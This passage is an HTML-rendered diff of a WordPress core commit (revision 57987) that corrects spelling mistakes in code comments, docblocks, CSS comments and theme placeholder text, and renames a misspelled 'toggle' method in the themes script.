</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Adds keyboard accessiblity to the panel.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Adds keyboard accessibility to the panel.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> keyboardAccessible: function( event ) {
</span><span class="cx" style="display: block; padding: 0 10px"> var isEnter = ( event.which === 13 ),
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpdashboardjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/dashboard.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/dashboard.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/dashboard.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -92,7 +92,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> setTimeout( function(){
</span><span class="cx" style="display: block; padding: 0 10px"> // Request the widget content.
</span><span class="cx" style="display: block; padding: 0 10px"> p.load( ajaxurl + '?action=dashboard-widgets&widget=' + id + '&pagenow=' + pagenow, '', function() {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Hide the parent and slide it out for visual fancyness.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Hide the parent and slide it out for visual fanciness.
</ins><span class="cx" style="display: block; padding: 0 10px"> p.hide().slideDown('normal', function(){
</span><span class="cx" style="display: block; padding: 0 10px"> $(this).css('display', '');
</span><span class="cx" style="display: block; padding: 0 10px"> });
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpeditorbasejs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/editor/base.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/editor/base.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/editor/base.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -265,7 +265,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Gets a list of unique shortcodes or shortcode-look-alikes in the content.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Gets a list of unique shortcodes or shortcode-lookalikes in the content.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @param {string} content The content we want to scan for shortcodes.
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -561,7 +561,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * By default TinyMCE wraps loose inline tags in a `<p>`.
</span><span class="cx" style="display: block; padding: 0 10px"> * When removing selection markers an empty `<p>` may be left behind, remove it.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @param {Object} $marker The marker to be removed from the editor DOM, wrapped in an instnce of `editor.$`
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @param {Object} $marker The marker to be removed from the editor DOM, wrapped in an instance of `editor.$`
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> function removeSelectionMarker( $marker ) {
</span><span class="cx" style="display: block; padding: 0 10px"> var $markerParent = $marker.parent();
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpeditordfwjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/editor/dfw.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/editor/dfw.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/editor/dfw.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1552,7 +1552,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> // Bind and unbind based on the distraction free writing focus.
</span><span class="cx" style="display: block; padding: 0 10px"> $document.on( 'dfw-on.focus', mceBind ).on( 'dfw-off.focus', mceUnbind );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Focuse the editor when it is the target of the click event.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Focus the editor when it is the target of the click event.
</ins><span class="cx" style="display: block; padding: 0 10px"> editor.on( 'click', function( event ) {
</span><span class="cx" style="display: block; padding: 0 10px"> if ( event.target === editor.getDoc().documentElement ) {
</span><span class="cx" style="display: block; padding: 0 10px"> editor.focus();
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpthemeplugineditorjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/theme-plugin-editor.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/theme-plugin-editor.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/theme-plugin-editor.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -191,7 +191,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> return;
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Scroll ot the line that has the error.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Scroll to the line that has the error.
</ins><span class="cx" style="display: block; padding: 0 10px"> if ( component.lintErrors.length ) {
</span><span class="cx" style="display: block; padding: 0 10px"> component.instance.codemirror.setCursor( component.lintErrors[0].from.line );
</span><span class="cx" style="display: block; padding: 0 10px"> return;
</span></span></pre></div>
<a id="trunksrcjs_enqueueswpthemejs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/_enqueues/wp/theme.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/_enqueues/wp/theme.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/_enqueues/wp/theme.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -926,7 +926,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> currentPreviewDevice = this.$el.data( 'current-preview-device' );
</span><span class="cx" style="display: block; padding: 0 10px"> if ( currentPreviewDevice ) {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- self.tooglePreviewDeviceButtons( currentPreviewDevice );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ self.togglePreviewDeviceButtons( currentPreviewDevice );
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> themes.router.navigate( themes.router.baseUrl( themes.router.themePath + this.model.get( 'id' ) ), { replace: false } );
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -988,10 +988,10 @@
</span><span class="cx" style="display: block; padding: 0 10px"> .addClass( 'preview-' + device )
</span><span class="cx" style="display: block; padding: 0 10px"> .data( 'current-preview-device', device );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- this.tooglePreviewDeviceButtons( device );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ this.togglePreviewDeviceButtons( device );
</ins><span class="cx" style="display: block; padding: 0 10px"> },
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- tooglePreviewDeviceButtons: function( newDevice ) {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ togglePreviewDeviceButtons: function( newDevice ) {
</ins><span class="cx" style="display: block; padding: 0 10px"> var $devices = $( '.wp-full-overlay-footer .devices' );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $devices.find( 'button' )
</span></span></pre></div>
<a id="trunksrcjsmediaviewstoolbarjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/js/media/views/toolbar.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/media/views/toolbar.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/media/views/toolbar.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -52,7 +52,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px"> },
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @return {wp.media.view.Toolbar} Returns itsef to allow chaining
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @return {wp.media.view.Toolbar} Returns itself to allow chaining
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> dispose: function() {
</span><span class="cx" style="display: block; padding: 0 10px"> if ( this.selection ) {
</span></span></pre></div>
<a id="trunksrcwpadmincsslisttablescss"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-admin/css/list-tables.css</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-admin/css/list-tables.css 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-admin/css/list-tables.css 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -904,7 +904,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> tr.inline-edit-row td {
</span><span class="cx" style="display: block; padding: 0 10px"> padding: 0;
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- /* Prevents the focus style on .inline-edit-wrapper from being cutted-off */
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ /* Prevents the focus style on .inline-edit-wrapper from being cut-off */
</ins><span class="cx" style="display: block; padding: 0 10px"> position: relative;
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span></span></pre></div>
<a id="trunksrcwpcontentthemestwentyfourteenincfeaturedcontentphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-content/themes/twentyfourteen/inc/featured-content.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-content/themes/twentyfourteen/inc/featured-content.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-content/themes/twentyfourteen/inc/featured-content.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -179,7 +179,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Return an array with IDs of posts maked as sticky.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Return an array with IDs of posts marked as sticky.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @since Twenty Fourteen 1.0
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunksrcwpcontentthemestwentyseventeenassetscsscolorsdarkcss"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-content/themes/twentyseventeen/assets/css/colors-dark.css</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-content/themes/twentyseventeen/assets/css/colors-dark.css 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-content/themes/twentyseventeen/assets/css/colors-dark.css 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -126,8 +126,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .widget .widget-title a:hover,
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .widget ul li a:focus,
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .widget ul li a:hover {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- -webkit-box-shadow: inset 0 0 0 rgba(255, 255, 255, 0), 0 3px 0 rgba(255, 255, 255, 1); /* Equivalant to #fff */
- box-shadow: inset 0 0 0 rgba(255, 255, 255, 0), 0 3px 0 rgba(255, 255, 255, 1); /* Equivalant to #fff */
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ -webkit-box-shadow: inset 0 0 0 rgba(255, 255, 255, 0), 0 3px 0 rgba(255, 255, 255, 1); /* Equivalent to #fff */
+ box-shadow: inset 0 0 0 rgba(255, 255, 255, 0), 0 3px 0 rgba(255, 255, 255, 1); /* Equivalent to #fff */
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .entry-content a,
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -137,8 +137,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .site-footer .widget-area a,
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .posts-navigation a,
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .widget_authors a strong {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- -webkit-box-shadow: inset 0 -1px 0 rgba(240, 240, 240, 1); /* Equivalant to #f0f0f0 */
- box-shadow: inset 0 -1px 0 rgba(240, 240, 240, 1); /* Equivalant to #f0f0f0 */
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ -webkit-box-shadow: inset 0 -1px 0 rgba(240, 240, 240, 1); /* Equivalent to #f0f0f0 */
+ box-shadow: inset 0 -1px 0 rgba(240, 240, 240, 1); /* Equivalent to #f0f0f0 */
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> body.colors-dark,
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -474,8 +474,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .widget ul li a,
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .site-footer .widget-area ul li a,
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .site-info a {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- -webkit-box-shadow: inset 0 -1px 0 rgba(34, 34, 34, 1); /* Equivalant to #222 */
- box-shadow: inset 0 -1px 0 rgba(34, 34, 34, 1); /* Equivalant to #222 */
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ -webkit-box-shadow: inset 0 -1px 0 rgba(34, 34, 34, 1); /* Equivalent to #222 */
+ box-shadow: inset 0 -1px 0 rgba(34, 34, 34, 1); /* Equivalent to #222 */
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /* Fixes linked images */
</span></span></pre></div>
<a id="trunksrcwpcontentthemestwentytwelveincblockpatternsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-content/themes/twentytwelve/inc/block-patterns.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-content/themes/twentytwelve/inc/block-patterns.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-content/themes/twentytwelve/inc/block-patterns.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -100,7 +100,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> <p class="has-drop-cap">' . esc_html__( 'Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth.', 'twentytwelve' ) . '</p>
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- /wp:paragraph -->
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:paragraph -->
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- <p>' . esc_html__( 'The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli, but the Little Blind Text didn’t listen. She packed her seven versalia, put her initial into the belt and made herself on the way. When she reached the first hills of the Italic Mountains, she had a last view back on the skyline of her hometown Bookmarksgrove, the headline of Alphabet Village and the subline of her own road, the Line Lane. Pityful a rethoric question ran over her cheek, then.', 'twentytwelve' ) . '</p>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ <p>' . esc_html__( 'The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli, but the Little Blind Text didn’t listen. She packed her seven versalia, put her initial into the belt and made herself on the way. When she reached the first hills of the Italic Mountains, she had a last view back on the skyline of her hometown Bookmarksgrove, the headline of Alphabet Village and the subline of her own road, the Line Lane. Pityful a rhetoric question ran over her cheek, then.', 'twentytwelve' ) . '</p>
</ins><span class="cx" style="display: block; padding: 0 10px"> <!-- /wp:paragraph -->
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:paragraph -->
</span><span class="cx" style="display: block; padding: 0 10px"> <p>' . esc_html__( 'It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar. Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth.', 'twentytwelve' ) . '</p>
</span></span></pre></div>
<a id="trunksrcwpcontentthemestwentytwentyassetsjsindexjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-content/themes/twentytwenty/assets/js/index.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-content/themes/twentytwenty/assets/js/index.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-content/themes/twentytwenty/assets/js/index.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -331,7 +331,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> } );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-}; // twentytwenty.instrinsicRatioVideos
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+}; // twentytwenty.intrinsicRatioVideos
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /* -----------------------------------------------------------------------------------------------
</span><span class="cx" style="display: block; padding: 0 10px"> Modal Menu
</span></span></pre></div>
<a id="trunksrcwpcontentthemestwentytwentyoneassetssass06componentsheaderscss"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -173,7 +173,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> margin-top: calc(0px - var(--button--padding-vertical) + (0.25 * var(--global--spacing-unit)));
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> #primary-mobile-menu {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // The 4.5px here is to offset the icon size horizontallly
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // The 4.5px here is to offset the icon size horizontally
</ins><span class="cx" style="display: block; padding: 0 10px"> // (the icon's width is larger than the path's width and has extra space on the sides).
</span><span class="cx" style="display: block; padding: 0 10px"> padding-left: calc(var(--global--spacing-horizontal) * 0.6 - 4.5px);
</span><span class="cx" style="display: block; padding: 0 10px"> padding-right: calc(var(--global--spacing-horizontal) * 0.6 - 4.5px);
</span></span></pre></div>
<a id="trunksrcwpincludesclasswpthemejsonphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-includes/class-wp-theme-json.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-includes/class-wp-theme-json.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-includes/class-wp-theme-json.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2893,7 +2893,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Returns the default slugs for all the presets in an associative array
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * whose keys are the preset paths and the leafs is the list of slugs.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * whose keys are the preset paths and the leaves is the list of slugs.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * For example:
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunksrcwpincludesembedphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-includes/embed.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-includes/embed.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-includes/embed.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -244,7 +244,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $embed = $wp_embed->autoembed( sprintf( 'https://youtube.com/watch?v=%s', urlencode( $matches[2] ) ) );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Filters the YoutTube embed output.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Filters the YouTube embed output.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @since 4.0.0
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunksrcwpincludesfunctionsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-includes/functions.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-includes/functions.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-includes/functions.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2270,7 +2270,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * PHP has issues with Windows ACL's for determine if a
</span><span class="cx" style="display: block; padding: 0 10px"> * directory is writable or not, this works around them by
</span><span class="cx" style="display: block; padding: 0 10px"> * checking the ability to open files rather than relying
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * upon PHP to interprate the OS ACL.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * upon PHP to interpret the OS ACL.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @since 2.8.0
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunksrcwpincludeshtmlapiclasswphtmltagprocessorphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-includes/html-api/class-wp-html-tag-processor.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-includes/html-api/class-wp-html-tag-processor.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-includes/html-api/class-wp-html-tag-processor.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2071,7 +2071,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /*
</span><span class="cx" style="display: block; padding: 0 10px"> * Purge updates if there are too many. The actual count isn't
</span><span class="cx" style="display: block; padding: 0 10px"> * scientific, but a few values from 100 to a few thousand were
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * tests to find a practially-useful limit.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * tests to find a practically-useful limit.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * If the update queue grows too big, then the Tag Processor
</span><span class="cx" style="display: block; padding: 0 10px"> * will spend more time iterating through them and lose the
</span></span></pre></div>
<a id="trunksrcwpincludesmsdeprecatedphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-includes/ms-deprecated.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-includes/ms-deprecated.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-includes/ms-deprecated.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -145,7 +145,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Deprecated functionality to determin if the current site is the main site.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Deprecated functionality to determine if the current site is the main site.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @since MU (3.0.0)
</span><span class="cx" style="display: block; padding: 0 10px"> * @deprecated 3.0.0 Use is_main_site()
</span></span></pre></div>
<a id="trunksrcwpincludesnavmenutemplatephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-includes/nav-menu-template.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-includes/nav-menu-template.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-includes/nav-menu-template.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -341,9 +341,9 @@
</span><span class="cx" style="display: block; padding: 0 10px"> if ( is_array( $terms ) ) {
</span><span class="cx" style="display: block; padding: 0 10px"> $possible_object_parents = array_merge( $possible_object_parents, $terms );
</span><span class="cx" style="display: block; padding: 0 10px"> $term_to_ancestor = array();
